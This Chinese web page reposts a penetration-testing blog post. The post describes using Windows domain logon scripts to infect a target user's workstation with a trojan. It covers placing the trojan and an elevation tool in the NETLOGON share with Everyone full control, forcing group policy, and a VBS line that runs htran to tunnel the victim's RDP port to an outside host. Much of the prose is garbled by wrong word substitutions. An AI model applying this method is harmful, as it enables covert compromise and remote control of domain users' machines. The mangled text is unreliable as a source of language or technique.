|
|
|
联系客服020-83701501

域内指定用户种马

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
域内指定用户种马

在咱们渗入渗出责任中,只要能入侵windows域中任意一台主机,就能够经由一些大雅才智拿到域管事器规画员权限。但是无意要入侵一些域内用户终端,有 时咱们只晓得方针的用户名,但是无奈判断他在哪台机器下面登录,若是经由bginfo记载登录事故的话,那也要需要很一时,但还不未必咱们的域管教器就 梗概管教他,以是咱们便梗概哄骗用户登录剧本实现让这台机器中马。多么打点了用户梗概会见访问域但是域管教器不成以规画用户登录机器的环境。

这里我阐明一点,当域用户在本机属于power users组如下权限时,是无奈运行exe的,咱们底子无奈判断用户在登录机器上的权限,以是咱们只要认为用户口角零碎规画员权限,哄骗lsrunas.exe工具来提取权限。

咱们翻开域的netlogon共享

将咱们需要哄骗的工具和木马(最好是零碎权限的)放到该目录,修正文件权限everyone完全管教权限。从此咱们配置域用户登录剧本。

末端哄骗gpupdate /force胁迫互换组战略,至此,全数配置已经完成,但是有的域用户登录两次才梗概上线,这里不是咱们所决定的。

留神:哄骗vbs剧本编写呼吁时需要留神,需要在objshell.Run””添加呼吁时假设想要哄骗双引号,未必要把呼吁哄骗双引号双层嵌套如

Objshell.run”cmd.exe /c “”htran.exe –p –slave 1.2.3.4 80 192.168.1.1 3389”””副本咱们的cmd.exe /c 后面之需要一层双引号,但是咱们为了让vbs语句畸形哄骗,必需要再哄骗一次。

91ri.org注:末端未必要哄骗gpupdate /force胁迫互换组战略,假如不有胁迫互换是不能奏效的!
本文摘自Chinadu博客由网络安然攻防研讨室(www.91ri.org) 动态安然小组收集整理.转载本文请驰誉原文地址及原作者版权动态。

数安新闻+更多

证书相关+更多